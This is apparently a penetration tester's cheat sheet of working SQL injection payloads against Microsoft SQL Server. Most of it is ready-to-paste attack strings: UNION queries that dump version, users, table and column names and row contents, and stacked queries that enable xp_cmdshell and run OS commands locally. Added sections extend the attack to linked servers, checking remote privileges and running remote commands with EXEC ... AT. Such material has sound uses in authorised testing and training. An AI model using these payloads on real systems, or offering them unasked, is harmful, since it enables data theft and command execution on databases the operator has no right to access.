# MSSQL

### Standard

```sql
-- XP_CMDSHELL (stacked query; xp_cmdshell is disabled by default and enabling it needs sysadmin or ALTER SETTINGS)
-- Command output is not returned to the page by an EXEC alone; it has to be read back via a UNION or an out-of-band channel.
Query: 00') EXEC xp_cmdshell 'net user'-- -
```
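Before firing xp_cmdshell it pays to check whether it can run at all and to get its output back. The sequence below is an added example, not part of the original notes: it keeps the page's assumed injection context (`00')` closing a quoted value, 11 UNION columns with a string-typed 4th column) and uses a hypothetical scratch table `dbo.poc_out` to capture the command output so the existing UNION pattern can read it.

```sql
-- Added example (not from the original notes). Assumptions: the same "00')" injection point,
-- an 11-column UNION with column 4 rendered by the app, and a hypothetical table dbo.poc_out.

-- 1. Login and role: IS_SRVROLEMEMBER('sysadmin') returns 1 if the current login is sysadmin.
Query: 00') UNION SELECT NULL,NULL,NULL,SYSTEM_USER + '|' + CAST(IS_SRVROLEMEMBER('sysadmin') AS VARCHAR(1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- 2. Is xp_cmdshell already enabled? value_in_use = 1 means yes.
Query: 00') UNION SELECT NULL,NULL,NULL,CAST(value_in_use AS VARCHAR(1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM sys.configurations WHERE name = 'xp_cmdshell'-- -

-- 3. Enable it (needs sysadmin or ALTER SETTINGS; 'show advanced options' must be on first).
Query: 00'); EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE-- -

-- 4. Capture output with INSERT ... EXEC into the scratch table (xp_cmdshell emits one row per line plus a trailing NULL row).
Query: 00'); CREATE TABLE dbo.poc_out (line NVARCHAR(4000)); INSERT INTO dbo.poc_out EXEC xp_cmdshell 'whoami /all'-- -

-- 5. Read it back through the normal UNION column; CAST to NVARCHAR(MAX) avoids STRING_AGG's 8000-byte cap.
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(CAST(line AS NVARCHAR(MAX)),'|') FROM dbo.poc_out WHERE line IS NOT NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- 6. Clean up.
Query: 00'); DROP TABLE dbo.poc_out-- -
```

Steps 3, 4 and 6 are stacked statements, so they only work if the injection point lets a new statement follow the closing quote (as the page's xp_cmdshell line already assumes); steps 1, 2 and 5 are plain UNION reads and work without stacking.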

### UNION

```sql
-- RANDOM
-- All UNION payloads on this page assume an 11-column SELECT whose 4th column is string-typed; adjust the NULL padding to the target.
--- Version
Query: 00') UNION SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- User (USER = database user; SYSTEM_USER = the login the application connects as)
Query: 00') UNION SELECT NULL,NULL,NULL,user,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- Databases by id (n = database_id: 1 = master, 2 = tempdb, 3 = model, 4 = msdb, user databases normally 5 and up; NULL means no database has that id)
Query: 00') UNION SELECT NULL,NULL,NULL,DB_NAME(n),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

------------------------

-- DATABASE INFORMATION
--- LIST TABLES
--- STRING_AGG needs SQL Server 2017+; OFFSET/FETCH needs 2012+ and always requires an ORDER BY. Raise OFFSET to page past the first 50 rows.
--- STRING_AGG over non-MAX types is capped at 8000 bytes and raises an error beyond that; wrap the column in CAST(... AS NVARCHAR(MAX)) for large dumps.
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables-- -
Query: 00') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_catalog = 'TEST_DB'-- -
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(table_name,'|') FROM (SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
--- One table per request: keep ORDER BY/OFFSET inside the scalar subquery. Placed after the UNION they would apply to the whole combined result (and would have to reference columns of the first SELECT), so the payload would error or return the application's own rows.
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT table_name FROM information_schema.tables WHERE table_catalog = 'TEST_DB' ORDER BY table_name OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- LIST COLUMNS (ORDER BY ordinal_position returns them in table order; table_name alone can match the same name in several schemas, add a table_schema filter if needed)
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM (SELECT column_name FROM information_schema.columns WHERE table_name='POC_Test' ORDER BY ordinal_position OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- DUMP CONTENT FROM COLUMN
--- SINGLE COLUMN
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(UserName,'|') FROM (SELECT UserName FROM POC_Test ORDER BY UserName OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

--- MULTIPLE COLUMNS (CONCAT_WS needs SQL Server 2017+ and silently skips NULL values, so fields shift; wrap nullable columns in ISNULL(col,'') when alignment matters)
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(CONCAT_WS(',',NameID,UserName),'|') FROM (SELECT NameID,UserName FROM POC_Test ORDER BY NameID OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY) AS t),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

------------------------

-- LINKED SERVERS (<HOSTNAME> = the linked server name as registered on the instance; the query text passed to OPENQUERY must be a string literal, so quotes inside it are doubled)
--- LIST COLUMNS
--- A scalar subquery must return one row, so take TOP 1 (or aggregate with STRING_AGG as in the second form) when the remote query can return several.
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT TOP 1 CAST(column_name AS NVARCHAR(MAX)) FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''TEST_TABLE''')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
--- ORDER BY/OFFSET here run on the remote server, so it must be 2012+; STRING_AGG runs locally.
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(column_name,'|') FROM OPENQUERY(<HOSTNAME>,'SELECT column_name FROM information_schema.columns WHERE table_name=''test_table'' ORDER BY ordinal_position OFFSET 0 ROWS FETCH NEXT 50 ROWS ONLY')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
```
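The OPENQUERY lines above assume you already know the linked server name. The block below is an added example, not part of the original notes: it finds the linked servers, checks what identity the link maps you to on the far side, pages remote databases, and then moves from read-only OPENQUERY to remote execution with `EXEC ... AT`. `<HOSTNAME>` is the page's placeholder for the linked server name; the 11-column UNION layout is the same assumption as on the rest of the page.

```sql
-- Added example (not from the original notes). Assumes the same "00')" injection point and
-- 11-column UNION; <HOSTNAME> stands for a linked server name found in step 1.

-- 1. Enumerate linked servers (sys.servers also contains the local instance; is_linked = 1 drops it).
--    An empty result can also mean the current login is not allowed to see that metadata.
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT STRING_AGG(CONCAT_WS(',',name,product,provider,data_source),'|') FROM sys.servers WHERE is_linked = 1),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- 2. Who are you on the remote side? The link's login mapping decides this, and it is often a more
--    privileged account than the one the web application uses locally. Quotes inside the literal are doubled.
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT TOP 1 CAST(who AS NVARCHAR(MAX)) FROM OPENQUERY(<HOSTNAME>,'SELECT SYSTEM_USER + ''|'' + CAST(IS_SRVROLEMEMBER(''sysadmin'') AS VARCHAR(1)) AS who')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- 3. Remote databases one per request (ORDER BY/OFFSET execute remotely; raise OFFSET to walk the list).
Query: 00') UNION SELECT NULL,NULL,NULL,(SELECT TOP 1 CAST(name AS NVARCHAR(MAX)) FROM OPENQUERY(<HOSTNAME>,'SELECT name FROM master.sys.databases ORDER BY database_id OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

-- 4. EXEC ... AT needs "RPC Out" enabled on the link; 1 here means it is.
Query: 00') UNION SELECT NULL,NULL,NULL,CAST(is_rpc_out_enabled AS VARCHAR(1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM sys.servers WHERE name = '<HOSTNAME>'-- -

-- 5. Remote execution (stacked statements, sysadmin on the remote side): enable xp_cmdshell there, then run a command.
Query: 00'); EXEC ('EXEC sp_configure ''show advanced options'',1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE;') AT <HOSTNAME>-- -
Query: 00'); EXEC ('xp_cmdshell ''whoami''') AT <HOSTNAME>-- -
```

Steps 1 to 4 are plain UNION reads; step 5 needs stacked queries and RPC Out. Output of a remote xp_cmdshell is not rendered by the page either, so capture it into a table on the remote side and read it back with an OPENQUERY SELECT, the same pattern as for the local case.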

